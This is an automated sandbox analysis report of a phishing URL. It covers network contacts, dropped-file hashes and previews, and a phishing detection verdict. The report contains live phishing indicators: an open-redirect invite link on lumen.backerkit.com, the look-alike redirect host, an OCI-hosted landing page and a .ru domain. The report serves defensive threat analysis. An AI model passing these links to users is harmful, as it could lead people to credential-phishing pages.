                                                                          ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.comSweden
                                                                          16253BORDERLIGHT-ASVretgrand18SEfalse
                                                                          151.101.129.229
                                                                          jsdelivr.map.fastly.netUnited States
                                                                          54113FASTLYUSfalse
                                                                          172.67.7.211
                                                                          lumen.backerkit.comUnited States
                                                                          13335CLOUDFLARENETUStrue
                                                                          104.18.94.41
                                                                          challenges.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          104.18.95.41
                                                                          unknownUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          142.250.185.100
                                                                          unknownUnited States
                                                                          15169GOOGLEUSfalse
                                                                          107.161.183.172
                                                                          rahul-garg-lcatterton-com.athuselevadores.com.brUnited States
                                                                          33182DIMENOCUSfalse
                                                                          239.255.255.250
                                                                          unknownReserved
                                                                          unknownunknownfalse
                                                                          188.114.97.3
                                                                          axelkirchhoffh.ruEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          188.114.96.3
                                                                          unknownEuropean Union
                                                                          13335CLOUDFLARENETUSfalse
                                                                          172.217.16.132
                                                                          www.google.comUnited States
                                                                          15169GOOGLEUSfalse
                                                                          104.17.25.14
                                                                          cdnjs.cloudflare.comUnited States
                                                                          13335CLOUDFLARENETUSfalse
                                                                          IP
                                                                          192.168.2.16
                                                                          192.168.2.14
                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                          Analysis ID:1544727
                                                                          Start date and time:2024-10-29 16:50:09 +01:00
                                                                          Joe Sandbox product:CloudBasic
                                                                          Overall analysis duration:0h 3m 34s
                                                                          Hypervisor based Inspection enabled:false
                                                                          Report type:full
                                                                          Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                          Sample URL:https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br
                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                          Number of analysed new started processes analysed:13
                                                                          Number of new started drivers analysed:0
                                                                          Number of existing processes analysed:0
                                                                          Number of existing drivers analysed:0
                                                                          Number of injected processes analysed:0
                                                                          Technologies:
                                                                          • HCA enabled
                                                                          • EGA enabled
                                                                          • AMSI enabled
                                                                          Analysis Mode:default
                                                                          Analysis stop reason:Timeout
                                                                          Detection:MAL
                                                                          Classification:mal52.phis.win@24/30@26/15
                                                                          EGA Information:Failed
                                                                          HCA Information:
                                                                          • Successful, ratio: 100%
                                                                          • Number of executed functions: 0
                                                                          • Number of non-executed functions: 0
                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                                                                          • Excluded IPs from analysis (whitelisted): 142.250.185.163, 142.250.186.142, 64.233.167.84, 34.104.35.123, 87.248.205.0, 2.23.209.150, 2.23.209.141, 2.23.209.132, 2.23.209.135, 2.23.209.149, 2.23.209.144, 2.23.209.189, 2.23.209.143, 2.23.209.140, 142.250.186.99, 142.250.184.206, 142.250.185.99
                                                                          • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, accounts.google.com, th.bing.com.edgekey.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, p-th.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, clients2.google.com, e86303.dscx.akamaiedge.net, edgedl.me.gvt1.com, th.bing.com, update.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: https://lumen.backerkit.com/invites/mAqpu6B5ZtIAsrg4a5WdGA/confirm?redirect_path=//rahul-garg-lcatterton-com.athuselevadores.com.br
                                                                          TimeTypeDescription
                                                                          11:51:50API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          No context
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 14:50:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2673
                                                                          Entropy (8bit):3.982853276263984
                                                                          Encrypted:false
                                                                          SSDEEP:48:8zPdwT0wHHsidAKZdA1FehwiZUklqehSy+3:8zuvS1y
                                                                          MD5:534CF663B27875B54C25B570B2D7725B
                                                                          SHA1:B4C909D24E7F426D4B694AE40251ED02696847C8
                                                                          SHA-256:A4F18A55990C257747143533901EA223D475453AD86198BAC950B794104334C4
                                                                          SHA-512:BC6353E94DEE4EC935D53ED92FB1C21804A6F6BC12BF5ADD5D1224C5ED2F6740B4B101063BEAA0CD01A72A12220EB1E523DE65F6E1CDFF1B6697965CAA424921
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.......P.*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YV~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 14:50:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2675
                                                                          Entropy (8bit):4.00021093900372
                                                                          Encrypted:false
                                                                          SSDEEP:48:8/dwT0wHHsidAKZdA1seh/iZUkAQkqehly+2:8evM9Q0y
                                                                          MD5:C015DA2ADAE35BB3CAB5BBB140989125
                                                                          SHA1:D7B247314127AB92EA9968908091313C443E77D3
                                                                          SHA-256:7A20EE098D01F1C31DCFFFD062188C8CB174D83B0223159E0F87667BCCAA4D06
                                                                          SHA-512:036A354241DDC71B7A32D699C0D152A0612034F43F1E27D6711BFD5321562B30EE02509C1554714FD13B0BFF715E29B5627068007F735BC8C84BA7A950C4A9A9
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,....@b.O.*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YV~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2689
                                                                          Entropy (8bit):4.009550270155695
                                                                          Encrypted:false
                                                                          SSDEEP:48:8DdwT0wAHsidAKZdA14meh7sFiZUkmgqeh7svy+BX:86vBnhy
                                                                          MD5:7AFE29A79F5167938FB820B4E253B9D9
                                                                          SHA1:D6EF8A544634EAFAA3FB904F1094908F1FE832C3
                                                                          SHA-256:F7E1E81D269912E36D2EE3978788EC62CC36D628F702149A9016996FB493609C
                                                                          SHA-512:ECDF8F62B80F209F731A45D6CF0F8FB3E6F338FC716441935D629C8F7F13D6889C4F41609C40FF7FC3260549AA7CBBB9239675AE27AEB784B241725EED076AB8
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.....Y.04...N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VFW.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 14:50:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2677
                                                                          Entropy (8bit):3.998415459593434
                                                                          Encrypted:false
                                                                          SSDEEP:48:8NdwT0wHHsidAKZdA1TehDiZUkwqehZy+R:8wvHny
                                                                          MD5:67553859580BA6D13F4CD049D1CE177B
                                                                          SHA1:6B61FB22083A8C5EF91BB32B684E61FA7C9946F9
                                                                          SHA-256:BBB3BDAD60DE9CDFC18E2594EBD6608085D17EC5276BAE5C23B95A8CBBD58C8A
                                                                          SHA-512:9A1E506B6C1B68C885A907886A315288E9B514A088319C0BBBF5829385362FEBD748D4D5D7C31E49F8D6ABC7D70588A03F46820C97BF312A0B0EC6110359D26D
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.....n.O.*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YV~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 14:50:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2677
                                                                          Entropy (8bit):3.9864589593663116
                                                                          Encrypted:false
                                                                          SSDEEP:48:80dwT0wHHsidAKZdA1dehBiZUk1W1qehry+C:8XvX9Ly
                                                                          MD5:D2BD3B7FCD248C8BC16325ECC72E07CA
                                                                          SHA1:15B56657145DF68F877B3D60E460A1D21DA11348
                                                                          SHA-256:E7361E231339997C697F0E8BA7BFEEE45694D76DD410C58EDFE8B907D4276257
                                                                          SHA-512:9CC561C8819ECD6CC6BD0FEB550B2256F645E2B53661206A5DB6FCD3BB75AD663B4511ECE69FCB0030DEC7A44245150EB4179F7AB76341875139B98275F98EDC
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,.....U.O.*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YV~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Oct 29 14:50:43 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):2679
                                                                          Entropy (8bit):3.9943112447902394
                                                                          Encrypted:false
                                                                          SSDEEP:48:8ddwT0wHHsidAKZdA1duTeehOuTbbiZUk5OjqehOuTbhy+yT+:8AvbTfTbxWOvTbhy7T
                                                                          MD5:9A700F680B51AE588C811C1BBD5963B9
                                                                          SHA1:7050EE85E3E0892E323DAE499FDF6AAE66AA8B38
                                                                          SHA-256:2D6FED805DFD966EABC70FDAB710DFC18BFE0CA363215C3DDCA746613FBD85EE
                                                                          SHA-512:DEFC2C982B4C4F3909BAA407D8CFC3B6C5BA710B542916A52B25906CB129DD2F22A0724B90A55EAC5B9AEFFA69E3C5FA43DA40F95099217E52291389E8EDA944
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:L..................F.@.. ...$+.,....'n.O.*..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....FW.J..PROGRA~1..t......O.I]YK~....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V]YU~....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V]YU~....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V]YU~..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V]YV~...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........V>.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                          Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                          Category:modified
                                                                          Size (bytes):4926
                                                                          Entropy (8bit):3.2456580362115903
                                                                          Encrypted:false
                                                                          SSDEEP:48:FaqdF78F7B+AAHdKoqKFxcxkFiF7KaqdF73x+AAHdKoqKFxcxkFdb:cEOB+AAsoJjykePEB+AAsoJjykb
                                                                          MD5:9D11C60C0D21F499C0B457E9CED030F9
                                                                          SHA1:67790F67F5F07CAF27EE8448417EA649C54A06FE
                                                                          SHA-256:9208BADA249106F2EAA2835C2CA7236E2F84282A807C606CF59CA0123143FE30
                                                                          SHA-512:D8DEE99AF002BBBDDB09CD2B4A5B2E2C4271EF90E24980F2E7BF144153D582C0F54CC285974A365745444C9C8388DEBE3B1CBD44F5765A5D0A9EFEAE800F9E9B
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:..........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....M.p.C.m.d.R.u.n.:. .C.o.m.m.a.n.d. .L.i.n.e.:. .".C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.\.m.p.c.m.d.r.u.n...e.x.e.". .-.w.d.e.n.a.b.l.e..... .S.t.a.r.t. .T.i.m.e.:. .. F.r.i. .. O.c.t. .. 0.6. .. 2.0.2.3. .1.1.:.3.5.:.2.9.........M.p.E.n.s.u.r.e.P.r.o.c.e.s.s.M.i.t.i.g.a.t.i.o.n.P.o.l.i.c.y.:. .h.r. .=. .0.x.1.....W.D.E.n.a.b.l.e.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .W.S.C. .S.t.a.t.e. .I.n.f.o. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*. .A.n.t.i.V.i.r.u.s.P.r.o.d.u.c.t. .*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.....d.i.s.p.l.a.y.N.a.m.e. .=. .[.W.i.n.d.o.w.s. .D.e.f.e.n.d.e.r.].....p.a.t.h.T.o.S.i.g.n.e.d.P.r.o.d.u.c.t.E.x.e. .=. .[.w.i.n.d.o.w.s.d.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3121), with CRLF, LF line terminators
                                                                          Category:downloaded
                                                                          Size (bytes):6376
                                                                          Entropy (8bit):5.722197918498447
                                                                          Encrypted:false
                                                                          SSDEEP:96:60do+3RpZnmwVqYyHRJzWpiWBe8SAQ0HdJG5yiU9QC73xagPI7gdcZJOAqdb:ndtLlgu6P0HnG5oIgPygyZJf8
                                                                          MD5:782018172584BAD54FA65658D0B28D44
                                                                          SHA1:9571D4C34F9ED813ECABFEABD2E6BED82ACFCF8D
                                                                          SHA-256:922A58FD5BBA32D4A68D34B0E355674AC64818F6C87738782DCC2A4BBD4D3878
                                                                          SHA-512:87B353F8650C9BFEB4925C8C116150562BB6358103A4814418300BFF8B978B9800C8A4B8BD50D89FE0B5E40169017A9B236ACF2A831692A34DD9B42B38D84824
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://ax3si7hub1rr.objectstorage.ap-singapore-2.oci.customer-oci.com/n/ax3si7hub1rr/b/bucket-20241028-2012/o/index.html
                                                                          Preview:<html>.....<head>.......<meta name="viewport" content="width=device-width,.initial-scale=1.0">.... <meta..name="robots" ..content="noindex, nofollow">.. <script .src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> </script>..... <script ..src="https://challenges.cloudflare.com/turnstile/v0/api.js"> </script>....<style>... .#kebob {display: .flex; align-items: center;...justify-content:.center; flex-direction: .column;.padding-top:.22%;}..#tack {padding-top:..3%;} ..@keyframes bounce {0%,..100%,..12.5%, 32.5%, 76.1% . {transform:. translateY(0);}22.5%, 86% .{transform: translateY(7px);}}#zeal. .{height: 179px;width:...130px;overflow: hidden;margin-top: -59px;}@keyframes..shadow-fade..{0%,.100%, .21.2%, 80%. {opacity: ..0;}47%, 70% {opacity:. 1;}}#facing {width:. 130px;margin-top:..179px;}#abandoned. {width: 130px;height:..71px;border-radius:.0 0. 7px. 7px;overflow:. hidden;margin-top:. -41px;}#abandoned ..>. .quaint {width: .287px;height:.71
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 116672, version 773.256
                                                                          Category:downloaded
                                                                          Size (bytes):116672
                                                                          Entropy (8bit):7.9897401211491745
                                                                          Encrypted:false
                                                                          SSDEEP:3072:y+cQdfEX4HdgCsxZhk8minCk+uU254aiRt3kLVzLm/j+G01Z:KQdfjIiib+uUe1EK66G4
                                                                          MD5:0474CCD4D3EC29857F1E7F8B9C56DF8B
                                                                          SHA1:3E8F0F46B2949DCC309F65FFF1372B9A05E8F480
                                                                          SHA-256:B66B3DA5FF7B2DB79B6CB5A22C3E762E2BF16958A11987E69EEB1980BBBCDFB0
                                                                          SHA-512:2AB61A54EE830519D0AACBA1E12F1AD920AEDDDEA8E682CEBE51BEC78ECD7BBC403343F8E00B45AFE804A954A52EB5DCC70983BB01239C36422F8E6F18E0BB5E
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/webfonts/fa-brands-400.woff2
                                                                          Preview:wOF2...................s.........................6.$. .`..H..V....L.... %H.qj..0=....yPF.....PUUO.a^..* ...o...o.........; ..o..~..u../..b...Y.u*.K......2..w.._..p.....1.n/...../F..t....O.e..:.....?..........B.U...4...G".@7...J.I.TZB......3..;.....c.5i-m.8.Z.:.&..iS..'.G.G...........~....>D.U....,.................%.d.1...p.8a'...h.Q..0Tp.J....)&)q.......9W.D.Z...f..{.{...[g.5.v..E4y...DCt..1b|./.....$.......$.'Y..m.,.......t...,6...Ni...)!f..-O.> '?..........L2....eDW.e..cY......*..B......-5../f...i......3.ai$.%[6.K..`..a.x...;.L.qN]vy...oC....g.:.3...I...d....Z....{+..@.eFV...92F.u...Vi..9...}...y.=..=r.=".?"s.=".?2..3..Lr".(Z....$..@....R.{&..#...L...0..h......H.-A.Y.$.`k..U.49Z,.f..Y'..`.f.f5..lVB(.2+p.[.@*...*......aCf...........F.Y...:kU-k.0....._.:..d8.,.$6.......ld29.....{.y..!..UF#..`P........M.....~.~.......FE+....W..a%......*j....j.=........y..~Y...=..]?.&......<...o.{....t....8.,......E ..%.@.E..G.h....Y.}.~d...5./...m4....r.
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:HTML document, ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):7576
                                                                          Entropy (8bit):4.735486138929419
                                                                          Encrypted:false
                                                                          SSDEEP:96:DYH07EForjyANSxT2CVIkURGyhpUgY9uhaznjQdLXLLJKLcLjx0DY:K07EF52CSnmuhazuJZxcY
                                                                          MD5:E8D6049CCAB8EBB3D39B40226ECEBEB9
                                                                          SHA1:1FFE2E43EFE6B4813F3DAB10A75C7D50BAC7D680
                                                                          SHA-256:E7054989713D977CFCFA79CFF3119BC961B56F2EE983072071660D3CF5F06F40
                                                                          SHA-512:060ACB84DCA86F29C13492C526A073C5EAF040ED45051BA3851C6A7E5299D439F3837802B5316D1FEC66B1B9692BC96BCF7B8F37CE73A60EEF40D1C41DF4DB41
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noarchive, nosnippet, noindex, nofollow">.. <title>Futuristic Classics Club - axelkirchhoffh.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css" rel="stylesheet">.. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.0/css/all.min.css" rel="stylesheet">..</head>..<body>....<nav class="navbar navbar-expand-lg navbar-dark bg-dark sticky-top">.. <div class="container">.. <a class="navbar-brand fw-bold" href="https://axelkirchhoffh.ru//">.. <i class="fas fa-car"></i> Futuristic Classics Club - AutoShowroom.. </a>.. <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav" aria-controls="navbarNav" aria-expanded="false" aria-label="Toggle navigation">.. <span
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47531)
                                                                          Category:downloaded
                                                                          Size (bytes):47532
                                                                          Entropy (8bit):5.399631966931825
                                                                          Encrypted:false
                                                                          SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                          MD5:808A57CAE0B6FEE71F46EFDDED44B348
                                                                          SHA1:DD570A24C8BDA1B391AA1DDEA6004125818E579A
                                                                          SHA-256:5B75AC6F98994352699841DFFA6E562725EBBD0005C539946AD3625EC550EB0F
                                                                          SHA-512:3F06DFBFDEDE9BB4270EB1BBBE29FFBDB6E19DC0AA8234E1A2B92D84F0737555031231965151EFC386510193343985BCEC63062484BBD8EC0540A94A0109B765
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          URL:https://challenges.cloudflare.com/turnstile/v0/g/f2bbd6738e15/api.js
                                                                          Preview:"use strict";(function(){function Wt(e,r,n,o,c,l,h){try{var p=e[l](h),f=p.value}catch(s){n(s);return}p.done?r(f):Promise.resolve(f).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);function h(f){Wt(l,o,c,h,p,"next",f)}function p(f){Wt(l,o,c,h,p,"throw",f)}h(void 0)})}}function V(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):V(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          File Type:ASCII text, with very long lines (47531)
                                                                          Category:dropped
                                                                          Size (bytes):47532
                                                                          Entropy (8bit):5.399631966931825
                                                                          Encrypted:false
                                                                          SSDEEP:768:khCcfnNm52VJHkmnX7knsQMcvjdMdSzCTLos4P8X60Yo6VA3H1KCZ2EHCb+I29Na:kbNm8JHnnX7ksG7CT0K6V4P8
                                                                          MD5:808A57CAE0B6FEE71F46EFDDED44B348
